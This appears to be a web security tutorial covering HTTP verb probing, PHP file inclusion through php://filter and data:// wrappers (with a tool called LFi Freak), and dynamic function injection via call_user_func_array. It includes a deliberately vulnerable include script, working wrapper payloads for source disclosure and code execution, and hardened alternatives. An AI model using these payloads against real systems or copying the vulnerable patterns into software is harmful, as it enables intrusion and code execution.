Exploiting HTTP Verbs

HTTP/1.1 defines the following verbs, or methods:

  • GET
  • HEAD
  • POST
  • PUT
  • DELETE
  • CONNECT
  • OPTIONS
  • TRACE

I assume you are already familiar with these; the HTTP/1.1 RFC describes each of them in detail. What matters for exploitation is not the list itself but which of them a given server actually answers, since the dangerous ones (PUT, DELETE, TRACE) are often left enabled by default.
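The first check I run is a verb probe. The script below is an added example, not code from the original post: it sends each of the eight methods as a raw HTTP/1.1 request over a socket (so no client library rewrites or hides the verb), compares the Allow header the server claims in its OPTIONS reply with what each verb really returns, and flags a TRACE that echoes the request or a PUT that is accepted. The host, port and probe path are command-line assumptions; use a throwaway path, because a server that honours PUT will actually create the file.

```php
<?php
// Added example (not from the original post): probe which HTTP methods a
// server answers. Only point it at a target you are authorised to test.
declare(strict_types=1);

/** Send one raw HTTP/1.1 request and return [status, headers, body]. */
function send_raw(string $host, int $port, string $method, string $target): array
{
    $sock = @stream_socket_client("tcp://{$host}:{$port}", $errno, $errstr, 5.0);
    if ($sock === false) {
        throw new RuntimeException("connect failed: {$errstr} ({$errno})");
    }
    stream_set_timeout($sock, 5);
    $body = ($method === 'PUT') ? "verb-probe\n" : '';   // small payload so PUT has something to store
    $req  = "{$method} {$target} HTTP/1.1\r\n"
          . "Host: {$host}\r\n"
          . "User-Agent: verb-probe\r\n"
          . "X-Probe: verb-check\r\n"                      // marker we look for in a TRACE echo
          . "Connection: close\r\n"
          . ($body !== '' ? "Content-Length: " . strlen($body) . "\r\n" : '')
          . "\r\n" . $body;
    fwrite($sock, $req);
    $raw = stream_get_contents($sock);
    fclose($sock);

    [$head, $respBody] = array_pad(explode("\r\n\r\n", $raw, 2), 2, '');
    $lines   = explode("\r\n", $head);
    $status  = (int) (explode(' ', array_shift($lines), 3)[1] ?? 0);
    $headers = [];
    foreach ($lines as $line) {                           // "Name: value" -> lower-cased map
        if (strpos($line, ':') !== false) {
            [$k, $v] = explode(':', $line, 2);
            $headers[strtolower(trim($k))] = trim($v);
        }
    }
    return [$status, $headers, $respBody];
}

/** Try every HTTP/1.1 method against $path and note the interesting outcomes. */
function probe_verbs(string $host, int $port, string $path = '/'): array
{
    $result = [];
    foreach (['OPTIONS', 'GET', 'HEAD', 'POST', 'PUT', 'DELETE', 'TRACE', 'CONNECT'] as $m) {
        // CONNECT takes host:port as its request-target, every other verb takes the path.
        $target = ($m === 'CONNECT') ? "{$host}:{$port}" : $path;
        [$status, $headers, $body] = send_raw($host, $port, $m, $target);
        $note = '';
        if ($m === 'OPTIONS' && isset($headers['allow'])) {
            $note = 'server claims Allow: ' . $headers['allow'];   // verify it with the rows below
        } elseif ($m === 'TRACE' && stripos($body, 'X-Probe: verb-check') !== false) {
            $note = 'request echoed back: TRACE is enabled';
        } elseif ($m === 'PUT' && in_array($status, [200, 201, 204], true)) {
            $note = "accepted: check whether {$path} now exists on the server";
        } elseif ($status === 405 || $status === 501) {
            $note = 'not allowed / not implemented';
        }
        $result[$m] = ['status' => $status, 'note' => $note];
    }
    return $result;
}

// Usage: php verb_probe.php <host> <port> <path>   (defaults are assumptions)
$host = $argv[1] ?? '127.0.0.1';
$port = (int) ($argv[2] ?? 80);
$path = $argv[3] ?? '/verb-probe.txt';
foreach (probe_verbs($host, $port, $path) as $method => $r) {
    printf("%-8s %3d  %s\n", $method, $r['status'], $r['note']);
}
```

Read the OPTIONS row as the server's claim and the other rows as the truth: an Allow header that omits PUT while the PUT row returns 201 is exactly the kind of mismatch worth a closer look.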

LFi Freak – An Automated File Inclusion Exploiter

I am sure you know about exploiting file inclusion vulnerabilities. A file inclusion bug generally lets us read arbitrary files on the system, or include remote ones, depending on the server's permissions and configuration. In PHP environments the classic approaches are poisoning a log file, or injecting PHP into the User-Agent header and then including “/proc/self/environ”. When the target is PHP, however, the built-in stream wrappers make exploitation much easier and can sometimes bypass existing filters.

There are a lot of LFI exploitation tools available, but I wrote this one to focus on the “php://input”, “php://filter” and “data://” wrappers. Although the name says “LFI Freak”, it can be used for RFI vulnerabilities as well. The tool is written in Python 2.7, and I have included binaries for both Windows and Linux. If you run it from source or want to modify it, you need the BeautifulSoup library.

Here is a small walkthrough of the features of the tool.

To test for local or remote file inclusion, use option one, “Automated testing”. I am using DVWA here. To try the tool yourself, create a small vulnerable file:

<?php
	// Deliberately vulnerable: whatever arrives as page= (GET, POST or, depending
	// on request_order, a cookie, since $_REQUEST merges them) goes straight into include().
	echo "File included: ".$_REQUEST["page"]."<br>";
	$file =  $_REQUEST["page"];
	include $file;
?>
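To see why the wrappers matter, here is an added example (not part of the original post or of LFi Freak) that drives the vulnerable include above from the PHP CLI, with no web server involved. It shows that a plain path merely executes the target file, that php://filter hands back its source instead, and that data:// turns the include into code execution with nothing on disk; then an allow-listed include refuses the same inputs. The temp directory, config.php and its password are constructed for the demo. data:// (like php://input) is only honoured when allow_url_include is on, so run it as `php -d allow_url_include=1 wrappers.php`; php://input is not shown because it reads the body of a real HTTP request, which the tool supplies by POSTing the PHP payload.

```php
<?php
// Added example, not the post's or the tool's own code. Needs
//   php -d allow_url_include=1 wrappers.php
// for the data:// step; everything else works with the default ini.
declare(strict_types=1);

$dir = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
mkdir($dir);
// Constructed target: a config file whose source the attacker wants.
file_put_contents("$dir/config.php", "<?php\n\$db_password = 'hunter2';\n");
// The vulnerable script from the page (without the echo line, to keep output clean).
file_put_contents("$dir/page.php", "<?php\n\$file = \$_REQUEST['page'];\ninclude \$file;\n");

/** Serve one "request" to a script with ?page=<value> and return what it printed. */
function request(string $script, string $page): string
{
    $_REQUEST['page'] = $page;
    ob_start();
    include $script;
    return ob_get_clean();
}

// 1. A plain path: config.php is executed, so its source never reaches the client.
$out = request("$dir/page.php", "$dir/config.php");
printf("plain path   -> %s\n", $out === '' ? '(nothing: config.php ran, nothing was disclosed)' : $out);

// 2. php://filter base64-encodes the file before include() parses it, so the
//    output is inline text rather than executed PHP: source disclosure.
$out = request("$dir/page.php", "php://filter/convert.base64-encode/resource=$dir/config.php");
printf("php://filter -> %s\n", $out);
printf("decoded      -> %s\n", trim(base64_decode($out)));

// 3. data:// makes include() run code that exists only in the URL.
$payload = 'data://text/plain;base64,'
         . base64_encode('<?php echo "PHP executed my code as " . get_current_user(); ?>');
if (ini_get('allow_url_include')) {
    printf("data://      -> %s\n", request("$dir/page.php", $payload));
} else {
    echo "data://      -> skipped: allow_url_include is off (the safe default)\n";
}

/** Hardened include: the request chooses a key, never a path, so no wrapper or
 *  traversal can be expressed. The page map is an assumption for the demo. */
function safe_include(string $dir, string $page): string
{
    $allowed = ['home' => 'home.php', 'about' => 'about.php'];
    if (!isset($allowed[$page])) {
        return 'refused: unknown page';
    }
    ob_start();
    include $dir . '/' . $allowed[$page];
    return ob_get_clean();
}

file_put_contents("$dir/home.php", "<?php echo 'welcome';\n");
foreach (['home', "php://filter/convert.base64-encode/resource=$dir/config.php", $payload] as $p) {
    printf("hardened(%.32s...) -> %s\n", $p, safe_include($dir, $p));
}

foreach (glob("$dir/*") as $f) { unlink($f); }   // tidy up the demo files
rmdir($dir);
```

The contrast between steps 1 and 2 is the whole point of php://filter: an include normally runs the file, so a raw path only leaks sources when the target is not valid PHP; encoding it first turns every include into a read primitive. Step 3 is why allow_url_include is off by default, and why the hardened version never lets a request string near include() at all.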


Dynamic Function Injection in PHP

In PHP we can choose a function and pass its arguments dynamically at runtime. Have a look at this example.

I have used call_user_func_array() to pass the arguments to the function. Its syntax is:

call_user_func_array(function, param_arr)

Since both the function name and the argument array come from $_GET, they can be chosen by whoever sends the request:

http://localhost/?func=user&args%5B%5D=Osanda&args%5B%5D=secret&args%5B%5D=abc@abc.com
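To make the risk concrete, here is an added example rather than the post's own code: a dispatcher built the way the text describes (callable and argument array taken from $_GET and handed to call_user_func_array), the query string from the post parsed the way PHP parses args%5B%5D, a second request that picks a different function, and a hardened dispatcher that maps the request onto a fixed table and checks the argument count. The body of user(), the "register" route key and the use of strtoupper as the stand-in for an attacker-chosen function are assumptions for the demo.

```php
<?php
// Added example (not the post's code): dynamic function injection via
// call_user_func_array, and an allow-listed alternative. Run with php 7.1+.
declare(strict_types=1);

/** Assumed application function; the post's request passes it three values. */
function user(string $name, string $pass, string $email): string
{
    return "registered {$name} <{$email}>";
}

/** The pattern from the post: both the callable and its arguments come from $_GET. */
function dispatch_vulnerable(array $get)
{
    return call_user_func_array($get['func'], $get['args']);
}

/** Hardened: the request selects a key in a fixed map; no request string is ever called. */
function dispatch_safe(array $get)
{
    $actions = ['register' => 'user'];                     // assumed route table
    $fn = $actions[$get['func'] ?? ''] ?? null;
    if ($fn === null) {
        throw new InvalidArgumentException('unknown action');
    }
    $args  = array_values((array) ($get['args'] ?? []));
    $arity = (new ReflectionFunction($fn))->getNumberOfRequiredParameters();
    if (count($args) !== $arity) {
        throw new InvalidArgumentException('wrong number of arguments');
    }
    return call_user_func_array($fn, $args);
}

// The query string from the post: args%5B%5D is PHP's args[] array syntax,
// so parse_str() yields ['func' => 'user', 'args' => ['Osanda', 'secret', 'abc@abc.com']].
parse_str('func=user&args%5B%5D=Osanda&args%5B%5D=secret&args%5B%5D=abc@abc.com', $get);
echo dispatch_vulnerable($get), "\n";            // registered Osanda <abc@abc.com>

// Nothing ties func to "user": any function name is accepted (system, phpinfo, ...).
// strtoupper stands in for the attacker's choice so the demo stays harmless.
parse_str('func=strtoupper&args%5B%5D=attacker+picked+this', $evil);
echo dispatch_vulnerable($evil), "\n";           // ATTACKER PICKED THIS

// The hardened dispatcher serves the intended request and refuses the other one.
parse_str('func=register&args%5B%5D=Osanda&args%5B%5D=secret&args%5B%5D=abc@abc.com', $ok);
echo dispatch_safe($ok), "\n";                   // registered Osanda <abc@abc.com>
try {
    dispatch_safe($evil);
} catch (InvalidArgumentException $e) {
    echo "refused: {$e->getMessage()}\n";        // refused: unknown action
}
```

The fix is not to validate the function name with is_callable() or function_exists(), which would still accept system; it is to make sure the value from the request is only ever used as a lookup key.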
